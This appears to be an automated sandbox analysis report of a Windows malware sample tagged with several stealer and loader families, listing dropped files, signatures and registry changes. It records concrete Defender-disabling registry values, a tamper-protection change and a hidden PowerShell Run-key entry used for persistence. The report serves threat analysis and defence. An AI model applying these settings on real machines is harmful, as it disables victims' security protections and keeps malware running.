Malware Analysis Report

2025-08-05 16:12

Sample ID 231026-j4mxxafb3x
Target 1ebe0ad8b3bc8ea05f93e39fdda5441263a5c3110fb3991bafeddb3fb331d26b
SHA256 1ebe0ad8b3bc8ea05f93e39fdda5441263a5c3110fb3991bafeddb3fb331d26b
Tags
amadey dcrat glupteba raccoon redline smokeloader zgrat 6a6a005b9aa778f606280c5fa24ae595 @ytlogsbot grome kinza up3 backdoor discovery dropper evasion infostealer loader persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1ebe0ad8b3bc8ea05f93e39fdda5441263a5c3110fb3991bafeddb3fb331d26b

Threat Level: Known bad

The file 1ebe0ad8b3bc8ea05f93e39fdda5441263a5c3110fb3991bafeddb3fb331d26b was found to be: Known bad.

Malicious Activity Summary

Glupteba

Suspicious use of NtCreateUserProcessOtherParentProcess

SmokeLoader

Amadey

ZGRat

Glupteba payload

Raccoon

RedLine

Detect ZGRat V1

Raccoon Stealer payload

Modifies Windows Defender Real-time Protection settings

DcRat

RedLine payload

Drops file in Drivers directory

Modifies Windows Firewall

Downloads MZ/PE file

Stops running service(s)

Reads user/profile data of web browsers

Executes dropped EXE

Windows security modification

Loads dropped DLL

Checks computer location settings

Checks installed software on the system

Adds Run key to start application

Accesses cryptocurrency files/wallets, possible credential harvesting

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Drops file in Windows directory

Drops file in Program Files directory

Launches sc.exe

Unsigned PE

Enumerates physical storage devices

Program crash

Uses Task Scheduler COM API

Modifies data under HKEY_USERS

Enumerates system info in registry

Suspicious use of AdjustPrivilegeToken

Checks SCSI registry key(s)

Suspicious behavior: GetForegroundWindowSpam

Creates scheduled task(s)

Suspicious behavior: MapViewOfSection

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-26 08:13

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-26 08:13

Reported

2023-10-26 08:16

Platform

win10v2004-20231023-en

Max time kernel

93s

Max time network

157s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Detect ZGRat V1

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\7D1E.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\7D1E.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\7D1E.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\7D1E.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\7D1E.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\7D1E.exe N/A

Raccoon

stealer raccoon

Raccoon Stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

ZGRat

rat zgrat

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7DAC.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\9879.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7A3C.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7B18.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7CA0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7D1E.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7DAC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tj3HU1US.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7EB7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RW4rc9EV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\CM2XZ5rM.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\gi9EF8It.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\1JL56KD9.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9879.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9A9D.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\9CA2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\A463.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\kos4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2Lj998Dz.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\Drive Tools\zDriveTools.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\478A.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A
N/A N/A N/A N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\7D1E.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\7D1E.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\gi9EF8It.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3125601242-331447593-1512828465-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\socks5 = "powershell.exe -windowstyle hidden -Command \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\9A9D.exe'\"" C:\Users\Admin\AppData\Local\Temp\9A9D.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\7A3C.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\Tj3HU1US.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\RW4rc9EV.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\CM2XZ5rM.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Drive Tools\is-2PIL8.tmp C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File opened for modification C:\Program Files (x86)\Drive Tools\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-DQGSI.tmp C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-5DV4U.tmp C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-J7RLE.tmp C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-9B0RE.tmp C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-1FH92.tmp C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File opened for modification C:\Program Files (x86)\Drive Tools\zDriveTools.exe C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
File created C:\Program Files (x86)\Drive Tools\is-TO13U.tmp C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-6UEO5.tmp C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\Lang\is-Q64NC.tmp C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\unins000.dat C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-2UQDS.tmp C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-Q69EF.tmp C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-SD465.tmp C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-3H7GU.tmp C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-MESDL.tmp C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-TVKF8.tmp C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-MPRLA.tmp C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-UBOBD.tmp C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-LLEIT.tmp C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-ILBID.tmp C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-UK9NO.tmp C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A
File created C:\Program Files (x86)\Drive Tools\is-E5230.tmp C:\Users\Admin\AppData\Local\Temp\is-SJ2US.tmp\LzmwAqmV.tmp N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Wanugegulaho milorahaxah mosuraxupib rusekutokefod bopujune C:\Users\Admin\AppData\Local\Temp\7EB7.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1662 = "Bahia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-682 = "E. Australia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-31 = "Mid-Atlantic Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-771 = "Montevideo Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-572 = "China Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2042 = "Eastern Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-662 = "Cen. Australia Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-384 = "Namibia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1862 = "Russia TZ 6 Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-3051 = "Qyzylorda Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1412 = "Syria Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-632 = "Tokyo Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2391 = "Aleutian Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-511 = "Central Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-541 = "Myanmar Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-381 = "South Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2001 = "Cabo Verde Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-412 = "E. Africa Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-621 = "Korea Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-962 = "Paraguay Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1831 = "Russia TZ 2 Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2842 = "Saratov Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-561 = "SE Asia Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-252 = "Dateline Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-411 = "E. Africa Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2771 = "Omsk Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2632 = "Norfolk Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2431 = "Cuba Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1021 = "Bangladesh Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-792 = "SA Western Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
